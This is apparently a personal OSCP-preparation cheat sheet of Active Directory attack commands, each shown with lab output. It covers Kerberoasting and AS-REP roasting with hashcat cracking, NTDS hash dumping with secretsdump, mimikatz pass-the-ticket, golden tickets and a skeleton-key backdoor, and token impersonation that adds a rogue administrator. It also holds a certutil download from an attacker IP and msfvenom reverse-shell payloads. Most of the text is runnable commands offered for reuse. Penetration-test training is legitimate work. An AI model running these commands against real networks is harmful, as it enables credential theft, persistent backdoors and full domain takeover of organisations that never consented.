WIP...

Here we go...

A collection of commands for AD enumeration and exploitation for OSCP preparation.

User Enumeration

Enumerate users for domain CONTROLLER.local on DC CONTROLLER.local

kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local /usr/share/wordlists/User.txt

Ticket harvesting and Passwort Bruteforcing

Capture TGTs sent to the KDC every 30 seconds

Rubeus.exe harvest /interval:30
  User                  :  CONTROLLER-1$@CONTROLLER.LOCAL 
  StartTime             :  2/7/2022 11:39:25 AM
  EndTime               :  2/7/2022 9:39:25 PM
  RenewTill             :  2/14/2022 11:39:25 AM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  Base64EncodedTicket   :

doIFhDCCBYCgAwIBBaEDAgEWooIEeDCCBHRhggRwMIIEbKADAgEFoRIbEENPTlRST0xMRVIuTE9DQUyiJTAjoAMCAQKhHDAaGwZr
...
MTkzOTI1WqgSGxBDT05UUk9MTEVSLkxPQ0FMqSUwI6ADAgECoRwwGhsGa3JidGd0GxBDT05UUk9MTEVSLkxPQ0FM

Password spraying

Rubeus.exe brute /password:Password1 /noticket

Kerberoasting

Kerberoasting allows a user to request a service ticket for any service with a registered SPN.

Tools I can use:

  • BloodHound
  • kekeo
  • Invoke-Kerberoast
  • Rubeus
  • Impacket

It really is that simple

> Rubeus.exe kerberoast

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0

[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts. 
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts. 

[*] Searching the current domain for Kerberoastable users

[*] Total kerberoastable users : 2

[*] SamAccountName         : SQLService
[*] DistinguishedName      : CN=SQLService,CN=Users,DC=CONTROLLER,DC=local 
[*] ServicePrincipalName   : CONTROLLER-1/SQLService.CONTROLLER.local:30111
[*] PwdLastSet             : 5/25/2020 10:28:26 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*SQLService$CONTROLLER.local$CONTROLLER-1/SQLService.CONTROLLER.loca 
                             l:30111*$206D1C13CC0B38A9BB6B7673E8BF8CBD$75C2C23607C1DB9C09872722E6915807DD3508 
...
E508230C3992BE14AA1ABED9488232E91B26EE5E57648E2A986D983DD1

[*] SamAccountName         : HTTPService
[*] DistinguishedName      : CN=HTTPService,CN=Users,DC=CONTROLLER,DC=local
[*] ServicePrincipalName   : CONTROLLER-1/HTTPService.CONTROLLER.local:30222
[*] PwdLastSet             : 5/25/2020 10:39:17 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*HTTPService$CONTROLLER.local$CONTROLLER-1/HTTPService.CONTROLLER.lo
                             cal:30222*$E704E9062B95E26AAE90DDD17AB00AFA$1EC0CB52D58766E91D142824911B86C72D71...
                             71299289062322C30A52854EA559A45F96CB0DFB1694A6255FFD00A4E4FACD4C1FA7A421BF2371E
                             7ACB0A385170191F06F194D62D8CD6D906A873985B96467F39ABD3DAF6F9

We can also use Impacket from a remote host to get the hashes

└─$ python2 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.216.129 -request
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

ServicePrincipalName                             Name         MemberOf                                                         PasswordLastSet      LastLogon           
-----------------------------------------------  -----------  ---------------------------------------------------------------  -------------------  -------------------
CONTROLLER-1/SQLService.CONTROLLER.local:30111   SQLService   CN=Group Policy Creator Owners,OU=Groups,DC=CONTROLLER,DC=local  2020-05-25 18:28:26  2020-05-25 18:46:42 
CONTROLLER-1/HTTPService.CONTROLLER.local:30222  HTTPService                                                                   2020-05-25 18:39:17  2020-05-25 18:40:14 

$krb5tgs$23$*HTTPService$CONTROLLER.LOCAL$CONTROLLER-1/HTTPService.CONTROLLER.local~30222*$edbe3a2b24df4573d6821395c197c0cd$c18adfdfa11ca868358b7c136c85941c810a4ef67c029a8893e16ef89b276a3cebbc727b5ec3cfbf2ab53cca38f324a753f1b4fa35a424b34137e76d36f439c696a97404736b0ba75887d62dd39186fba0fab701ca759d657c08f2c2ac0ab0e463d1755bc405716e5ee4a375f41b066bd56d84e54b2a8291786c7c9b3cd5deb1cac6d50d0f1806f130105830c478930cab743af289146f95a91e6873b4886dfa88e4502c2c321d39199f59fa3997d7c7e6cc998da1f8e4ed72214aaeee294c35800127057c8f3b01bcc77e5a461e236d09f7e7d2916239eeca7ae85c999f2135680284de2e8c59c61a8fa26b21783c240dd803d05eb134a1aa0923f8b2a9f15ae71214aa95338a0052754ddae224324f455368a8b90639860a6a2032a7405b6790f37d9c38b5457e5898d4f777a6677d12ad57cc666c18294e10adea825dd039a717dbfa04ffa9dcd7e08d0b4033b5811b7dc789db8df09df3965984cbb0c551716ef670e02393ed52e7cfe27aa285e557c7622d21e47459382f26d22fdab08e3e999fb86c2d05a717db41d44567cba0699c48d995d57290e3b47ccd99f3e87f7af192f54089f14c81be6aadfac74f7c27d67012a6cde1015da932a49c0451409549d2addcad552127713125a822250ecf7b5ed3824ccf9c72ee2a92cd5a2cf6d30e5b0ff5eb8ec1bef820779d0c1c022e3f6f77017440c93c18d5a92bc09618d2030d5906060a7a5aaacb7ae7305069f592037c37cbadd79d47b6ea1ea544845053d8dca191e4a8e0b4787e10cc37d736c08ee6bf50d99d62a108bd092bd7235c93208b75c97ce351239e7d87e782b80732d4b23263e94c3de1006c9dc68f76866c0110710778f485ea85a476759d209cb36b0019a8489e47e627dc23892fd459a3b8a1c5986cfa457911b0974254e62f006e6e6c9060b815b23c5b99b69c62dd7649e87393c1fca42a5bea022ca23dbe1d9e6ee5f05d70366116a226b50729da585189cb0bfa3740fd485e3613f43321b70db07e3763e62a419f0e3aa5cfaac2637c7528ff293609b45d7aaa5f21ae43f0d007bcb44bbb2e6f9125ee97b9447b46838316de16dd82b398f1db1114ad0c3fb70fcb85394e365e69c22a37dd464581ca3a0768b10b24030f5db04fd248465565ed733d595857376326335e3c4b8bf00f47301252081d6cae1d25c588e62b5b67c3465e6a955ee8fdee15053ce4aafea986fcba21e25dba5b885704774a89886238317324367b6dab03eb338254b1a370c7199f8335a893c5db5003a2ee9ecdb162b73cf0937a00ac2c456bab4107e3bd3aa32e30d11e5577d349bb0e5b3f9e066b41b33bc5ac2f1b80899a5e99b2e3393f7f902bd704c69477f4c54fb983
$krb5tgs$23$*SQLService$CONTROLLER.LOCAL$CONTROLLER-1/SQLService.CONTROLLER.local~30111*$7c05198e5d3dbd2432103de303460084$202eb9c02b94046031d53ca4fde75d47ace3c77602d93c6b04c10a3e58c4ee7a1352d91fac43a2164eb8be0cc23b16d88355e73f8712536cc4d1087cb02bcf1cc3aa24410b0f9ee48f53c828f2323fadebeffc4f1251967983a490ec5d21a01643659e278b559041144796010fa5faf969c15864e9e495062bf9e91661a69127c0f932102bae89e1520cb815717be27668948afd2bf83eb156868952c88225742827cbfc9fbaabb2bdaa4507fc990e6e97a2463525209aafe000a2c8087b03aef296400c0e88505f2ee51a051deca47ee46729ca20c9d13f9f5ebb35185b2bea207f30c226d473f80e4392d136242e16bd85a82c804625f433f011ba0ec5bd1dca19a18da1e8af99d1735fa02972afcc9825b3870b7101e060d31305bc56a6cb2a2f479ef5181ec0caab549ec82ea9d0bee9a7b8e957b9534123edaabdd64125ff1193896b947f5415eef59e2762b3d78d56d3885f94f7385ef0d617e799dc93f07f83dc3e7821a79702106757b9f33f384609f51e51e9f096831256b4eba1fe62916b3b4a4d638e10ba14c793036effb0ea25410c992026c901006c17742be7bc986a7ecbe6d88550621a772909e8c20a82add57ce42e9de3408569d4d4d3ef1f4f71a38c2e4770fcbf8cb65fbdfa4d49ad94a72e4c59e8ba7b361940f93803801e534448c475d7630ee1e4f9a14e24fea65cb4babb42be31294d4cb6deb557e76a64108a08013c3aeb3a19b8e2b477d0f47df8cf3ae74740bc47208d5c91da947771a6d7d1db7f99be2716f8bf6e54416441936ae58b32347c6fca1e91f0d6b317c92e146166f94ee7bca887077a435e883845a7d29a0740ec3ae2d8594cf387f1db990d28db1c472d9ceb114ae8e948972aa04a3891ae9567aff4e3efec1c6a1bd46932b705517ae40cfeb25ff23288f6636b4403fb1f34fee8c008c32fcdc4934035d9da73932bf60c7aacd07b9b450daacf96b2cc010b7bdfd132646a52c6e68b43a29914ea4f6be9a2a159334e1fcb09ae4ffc910e918b121c9336621cad24abb49e43275f2f10b2936f76960650fd3269a3053a802e76a19dab67c3dc34937b003b38808b5a9509a0e1403ea0f43b0e0421754a58f657593e30ad990c506d82ced50f112c55ad696c54d41249beb66050af783818317e26b9f5228b62cb25e43a564b68acb060c63ae9c0f67921069983f5ca7f06ac85905c414b279f73293f21fd8a26c6be3107813eeac51ec61d30fd974361ef321103ac0d898924a063f8222ebf37d88b2ec74019489a2b37ab18f82e3fac909dd4841b7e4118181afc0d2def0bc953b72ffcc62bd79f3a4d574378df5f1e49683cdcf03d23909200044e1edd42af76bce4eb1bcf73f80204

Now crack the hash

└─$ hashcat -m 13100 -a 0 http_service.hash Pass.txt                                           
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 2.0 pocl 1.8  Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=====================================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-10510U CPU @ 1.80GHz, 5836/5900 MB (2048 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 134 MB

Dictionary cache built:
* Filename..: Pass.txt
* Passwords.: 1240
* Bytes.....: 9706
* Keyspace..: 1240
* Runtime...: 0 secs

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.  

$krb5tgs$23$*HTTPService$CONTROLLER.local$CONTROLLER-1/HTTPService.CONTROLLER.local:30222*$e704e9062b95e26aae90ddd17ab00afa$1ec0cb52d58766e91d142824911b86c72d71d94b7ee79eaff3a948822751a92af00b112372518ab77d5e1a3d4b618d428942bce1fd18d0f7f75ee64d7b2c9e0b8b52643bf9d94cd1b02512c1a403eabb70d9525c1567d830c4d2ff756f4eaeda30b5f5156ec619a4dfb279ead114d959b0de3f9893025676d8665ccf24bc0656ace0eb5d97fc79169c9e92780fa4918af51142550146eb9eeeb7d970e74366a30c95ad6533d45d0a4679199f2e322ae98b91fee0034c8bb28ed44e8f9dc59ea058181861692bb36e2ed1f063fae8192e3a7e7ce8a304dc6c0662fdb52f735f204222c33dff96bd4daec3ae364de12e07c58d429813b7c7e235f966844e7f3dfe256c37e82c19e01fbee83b4fbaf6b67f38887fc30376b08c5381d0f33fa5ee5db3ac6a440d15fa7e63a6c403dc2673f08ae0d6d9f0b2c07c5905f5455db72f2f9ee7e6d1a9c30a5edc1ca6de3ffed1e54972ab1ac9c679c9f7acbe715e0a6dc02f298950c8b81b8e75a5ac673b0eec7dd0dd52aa397f5e08dc0efde675d66cf1414b1a2fb6379742ab6b50409f446ed3bdc07c6a1004faa426dff55aa562b43f38e7a22f403e57bd68b7418aea0409df4a19d300d2ff12a7bcfcf12f29243a74b62187b6a173bb022ffeaa0198dae5644132d52e571aa607b6c6705b955505089cbe5f8033e1b386a13fc9722af35f542803e96663febd417e90f5c69af8ce31007c9c42bb46b8b0cfc0749e37dea753cbfd6e70d82dc9eb47bdb9941c0a8ff26f8c6f11bc41fee8aee60e6816e4293142e93adfac780ef53e22980ba49f90a3ad0a6b639c63ba6e7f314db9aac6b58e9b593f2c4794ef448a25b42e377a2bed8c8fae55efb1607448f948697d34e64e19ebc3bb43ac52ae70b0990f4485bfee6ca92ebcf55322f8f896160b0a7dca3b65296aee8686bd6fe480a5beb08fb235222837b27c4706e398a76da42cdd89f3ef097376eb19d6332914031818490f8c84850bd21a0e7bfb6eab2ca2a49ee56298f489bffa170aa3420d78b5571bd14a2de51056773ba268f2e70ba5ced238d829386df1811d65c901e340f395cc28adbb23e1e569931dadb41ec46856a4ec2974f7ee1d48b887982926ac8be2ad3face7720d1fd6e59392e7e1e6aa2492514a8e2c73a23a62092740a0753588cc0fe06340a02711fe49c0b51475fa4179022605d5dfb65da9d326052e47bb8960db792da01d6f72541227a0a75396ff11c22d40cf43b532d31559a1d4fe9c7e8c81bb7e967b7328977d76d5314a83cc469f3b201b0dadd18155a4965e63f6b44ead8ff380b730401e2bfbe88a8f2c7e8bd85511908bf496ba181c233486a7aee2f2229b4661b616f419c1fe3cd42946c2a457e89c49f45540dac819a06b3556dd7a56a3cb1b253e427029fcfaa3873dbe5df3af4319277625c4928f136562ee36b139e11ede4946b84ac0c8b35c2c5a515700d4e5917df212983a334a5ac08ce5382ee6aa3f21ed0663635a413f90f32ad0122b947fcdc4b43e1a6d5045b93c5918eb87897db2ae924ecf2e7cb71299289062322c30a52854ea559a45f96cb0dfb1694a6255ffd00a4e4facd4c1fa7a421bf2371e7acb0a385170191f06f194d62d8cd6d906a873985b96467f39abd3daf6f9:Summer2020

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*HTTPService$CONTROLLER.local$CONTROLLE...daf6f9
Time.Started.....: Mon Feb  7 15:34:26 2022 (0 secs)
Time.Estimated...: Mon Feb  7 15:34:26 2022 (0 secs)
Guess.Base.......: File (Pass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   236.6 kH/s (1.28ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 1240/1240 (100.00%)
Rejected.........: 0/1240 (0.00%)
Restore.Point....: 0/1240 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 123456 -> hello123

AS-REP Roasting

Similar to Kerberoasing, AS-REP Roasting dumps the krbasrep5 hash of user accounts that have Kerberos pre-auth disabled which means those users don't need to be service accounts.

Rubeus.exe asreproast

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0

[*] Action: AS-REP roasting

[*] Target Domain          : CONTROLLER.local

[*] Searching path 'LDAP://CONTROLLER-1.CONTROLLER.local/DC=CONTROLLER,DC=local' for AS-REP roastable users
[*] SamAccountName         : Admin2
[*] DistinguishedName      : CN=Admin-2,CN=Users,DC=CONTROLLER,DC=local
[*] Using domain controller: CONTROLLER-1.CONTROLLER.local (fe80::e05e:1173:33f7:7c9%5)
[*] Building AS-REQ (w/o preauth) for: 'CONTROLLER.local\Admin2'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

      $krb5asrep$Admin2@CONTROLLER.local:3C51D07F1843F12D66E4BBB233C09CE3$795884C015C4
      574540500F23BF6F07D4962505A2DFC15F45E3F9FDE5596024E9C5E92D0B089581817FAFD6B7F479
      3AE38258DDACFBB373D26227229F9F1EC3885855FA5A7C57180C385281A565D6F245CF02E9B48CE9
      2428147580353F9E337F0002F6C7D86FA054F6E5F4FE1022EF897F1CCEE8FB118D7AFCE5D83AB816
      3CC4CC1A66918FC402ECE66233CCDD33FA646FC333248CABC280F9FF83EA0CFBA36FE93681C3B8B8
      5CF8069493053A6216CD5A2EFCD1A60328CA8B5CAE00264FB6D561CDA1535C6BD68B293E5E6FD4C4
      F22708D78352E1DA494134A28F600D9354C97B1DC1341B50344E05D53D1811BB3B9A4A7EA62D

[*] SamAccountName         : User3
[*] DistinguishedName      : CN=User-3,CN=Users,DC=CONTROLLER,DC=local
[*] Using domain controller: CONTROLLER-1.CONTROLLER.local (fe80::e05e:1173:33f7:7c9%5)
[*] Building AS-REQ (w/o preauth) for: 'CONTROLLER.local\User3'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

      $krb5asrep$User3@CONTROLLER.local:CA336057CAD77194863CD97401A4B06A$328EC569B6006
      B60093AD9B47EC31AAAAF5725DADFF587AC393521389AEC08A695B92824B9975312931292D58F68C
      C18E1A81B883B0B4CFCE5A68CFF24D7772B183F893CA763A7644D5D26A1475C7EAA2E443CADBE727
      D98B4075A0E44805B55AAF6A23E78821B38F9DB831CF14D636EAD35C0139965A4819A2723C375EA9
      DDBF4ADE7DA54DE4F176F49981938EF496A55F83DEFEEC30B6BB72F70F0720F8E92D8A8A9E0F5D3E
      27306C9D6309AAA8FCA49B1D6ED714FEC746A4AA6EF53DC364C5491405F469DF288FE038AE8EB0E3
      D8BB5A6DB13822F4ACDFC7F65D43F9DE8AFB693CA19CB747AEF92BFDF8451E80826669FFCC3

IMPORTANT Insert 23$ after $krb5asrep$ so that the first line will be $krb5asrep$23$User..... to crack the hash

Then crack the hash using hashcat -m 18200 hash.txt Pass.txt

Also we can achieve the same with impacket.

python3 impacket/examples/GetNPUsers.py spookysec.local/svc-admin -dc-ip 10.10.253.53

Dump Password hashes

└─$ python3 impacket/examples/secretsdump.py backup:backup2517860@spookysec.local 
Impacket v0.9.25.dev1+20220331.224942.eb283663 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::

Pass the ticket

For this attack we'll be using Mimikatz which allows us to dump the TGT from LSASS memory. 

controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

If this commands returns '20' OK it does not that means you do not have the administrator privileges to properly run mimikatz

mimikatz # privilege::debug 
Privilege '20' OK 
mimikatz # sekurlsa::tickets /export 

Authentication Id : 0 ; 1202421 (00000000:001258f5) 
Session           : NetworkCleartext from 0
User Name         : Administrator
Domain            : CONTROLLER
Logon Server      : CONTROLLER-1
Logon Time        : 2/8/2022 8:38:42 AM
SID               : S-1-5-21-432953485-3795405108-1502158860-500

         * Username : Administrator
         * Domain   : CONTROLLER.LOCAL
         * Password : (null)

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ? 

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 2/8/2022 8:38:42 AM ; 2/8/2022 6:38:42 PM ; 2/15/2022 8:38:42 AM
           Service Name (02) : krbtgt ; CONTROLLER.LOCAL ; @ CONTROLLER.LOCAL
           Target Name  (02) : krbtgt ; CONTROLLER.LOCAL ; @ CONTROLLER.LOCAL
           Client Name  (01) : Administrator ; @ CONTROLLER.LOCAL ( CONTROLLER.LOCAL )
           Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             5a88b21f145c0e23bc1a9b3ea3506d987cff9a338de6360de24dc6112a85b49e
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...] 
           * Saved to file [0;1258f5]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi !

This will dump all the capured .kirbi tickets to the current directory


02/08/2022  09:12 AM    <DIR>          .
02/08/2022  09:12 AM    <DIR>          ..
05/25/2020  02:45 PM         1,263,880 mimikatz.exe
05/25/2020  02:14 PM           212,480 Rubeus.exe
02/08/2022  09:12 AM             1,595 [0;1258f5]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022  09:12 AM             1,787 [0;18e8aa]-1-0-40a50000-CONTROLLER-1$@GC-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022  09:12 AM             1,587 [0;27833a]-2-0-60a10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022  09:12 AM             1,755 [0;36502]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022  09:12 AM             1,587 [0;3691f]-2-0-60a10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022  09:12 AM             1,791 [0;3e4]-0-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022  09:12 AM             1,587 [0;3e4]-2-0-40e10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022  09:12 AM             1,755 [0;3e7]-0-0-40a50000-CONTROLLER-1$@HTTP-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022  09:12 AM             1,787 [0;3e7]-0-1-40a50000-CONTROLLER-1$@GC-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022  09:12 AM             1,721 [0;3e7]-0-2-40a50000-CONTROLLER-1$@cifs-CONTROLLER-1.kirbi
02/08/2022  09:12 AM             1,711 [0;3e7]-0-3-40a50000.kirbi
02/08/2022  09:12 AM             1,791 [0;3e7]-0-4-40a50000-CONTROLLER-1$@cifs-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022  09:12 AM             1,791 [0;3e7]-0-5-40a50000-CONTROLLER-1$@LDAP-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022  09:12 AM             1,721 [0;3e7]-0-6-40a50000-CONTROLLER-1$@LDAP-CONTROLLER-1.kirbi
02/08/2022  09:12 AM             1,755 [0;3e7]-0-7-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022  09:12 AM             1,647 [0;3e7]-1-0-00a50000.kirbi
02/08/2022  09:12 AM             1,587 [0;3e7]-2-0-60a10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022  09:12 AM             1,587 [0;3e7]-2-1-40e10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022  09:12 AM             1,755 [0;5646d]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022  09:12 AM             1,755 [0;564c9]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022  09:12 AM             1,791 [0;56505]-1-0-40a50000-CONTROLLER-1$@LDAP-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022  09:12 AM             1,755 [0;5653e]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi

With those we can pass the hash and impersonate the admin

mimikatz # kerberos::ptt [0;1258f5]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi 

* File: '[0;1258f5]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi': OK

To verify we can use klist

klist

Current LogonId is 0:0x1258f5

Cached Tickets: (1)

#0>     Client: Administrator @ CONTROLLER.LOCAL
        Server: krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 2/8/2022 8:38:42 (local)
        End Time:   2/8/2022 18:38:42 (local)
        Renew Time: 2/15/2022 8:38:42 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

Golden Ticket/Silver Ticket Attacks

When staying undetected, getting a silver ticket is the better option instead of getting a golden ticket. This is because a silver ticket is limited to the service that is targeted whereas a golden ticket has access to any Kerberos service.

Dumping the krbtgt

mimikatz # lsadump::lsa /inject /name:krbtgt 
Domain : CONTROLLER / S-1-5-21-432953485-3795405108-1502158860 

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 72cd714611b64cd4d5550cd2759db3f6
    LM   :
  Hash NTLM: 72cd714611b64cd4d5550cd2759db3f6 
    ntlm- 0: 72cd714611b64cd4d5550cd2759db3f6
    lm  - 0: aec7e106ddd23b3928f7b530f60df4b6

Creating a golden/silver ticket

Golden Ticket
mimikatz # Kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:d01d6ccf97a2ee214ec7185173a3b659 /id:1103

Silver Ticket
mimikatz # Kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:d01d6ccf97a2ee214ec7185173a3b659 /id:1103

We can now open an elevated command prompt `misc::cmd

Backdooring Kerberos

We can implant a mimikatz skeleton and abuse the way AS-REQ works while using RC4 ciphers
The default hash for a mimikatz skeleton key is 60BA4FCADC466C7A033C178194C03DF6 which makes the password -"mimikatz"

misc::skeleton

That's it... That's how you backdoor a Microsoft authentication service. I know it's RC4 but still! This is amazing!!!!

Now we can view network shares using
net use c:\\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz

SMB

Enumerate with nmap
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.232.66

List share files
smbclient //10.10.232.66/anonymous

Recursively download files
smbget -R smb://<ip>/anonymous

Privesc

Unquoted service path

Powerup.ps1

Download
certutil.exe -urlcache -split -f http://10.8.49.147:1337/PowerUp.ps1 PowerUp.ps1

Load and execute

PS C:\tmp> . .\PowerUp.ps1
PS C:\tmp> Invoke-AllChecks

Microsoft splits the path with a space and appends ".exe" after every split. Generate a reverse shell with the name of the next folder
c:\users\admin\my service\bin\start.exe
c:\users\admin\my\service.exe

Restart service 

net stop servicename
net start servicename

token imprtsonation

There are two types of access tokens:

primary access tokens: those associated with a user account that are generated on log on
impersonation tokens: these allow a particular process(or thread in a process) to gain access to resources using the token of another (user/client) process

For an impersonation token, there are different levels:

SecurityAnonymous: current user/client cannot impersonate another user/client
SecurityIdentification: current user/client can get the identity and privileges of a client, but cannot impersonate the client
SecurityImpersonation: current user/client can impersonate the client's security context on the local system
SecurityDelegation: current user/client can impersonate the client's security context on a remote system

where the security context is a data structure that contains users' relevant security information.
The privileges of an account(which are either given to the account when created or inherited from a group) allow a user to carry out particular actions.
Here are the most commonly abused privileges:

SeImpersonatePrivilege
SeAssignPrimaryPrivilege
SeTcbPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeCreateTokenPrivilege
SeLoadDriverPrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege

View privileges
whoami /priv

Impersonation with Invoke-TokenManipulation.ps1

. .\Invoke-TokenManipulation.ps1
PS C:\Program Files (x86)\Jenkins> Invoke-TokenManipulation -Enumerate

Incognito also looks nice

PS C:\Program Files (x86)\Jenkins> cmd.exe /c "incognito.exe list_tokens -g"
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Listing unique users found

PS C:\Program Files (x86)\Jenkins> cmd.exe /c "incognito.exe add_user xnull password"
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user xnull to host 127.0.0.1
[+] Successfully added user
PS C:\Program Files (x86)\Jenkins> cmd.exe /c "incognito.exe add_localgroup_user Administrators xnull"
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user xnull to local group Administrators on host 127.0.0.1
[+] Successfully added user to local group
PS C:\Program Files (x86)\Jenkins> net user xnull
User name                    xnull
Full Name                    xnull
Comment                      
User's comment               
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/14/2022 9:54:21 PM
Password expires             3/28/2022 9:54:21 PM
Password changeable          2/14/2022 9:54:21 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators       
Global Group memberships     *None                 
The command completed successfully.

Then RDP into it
rdesktop -u xnull -p password 10.10.175.25

Reverse Shell

Exe using msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1338 -f exe -o Advanced.exe
or
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.8.49.147 LPORT=1339 -f exe -o shell.exe

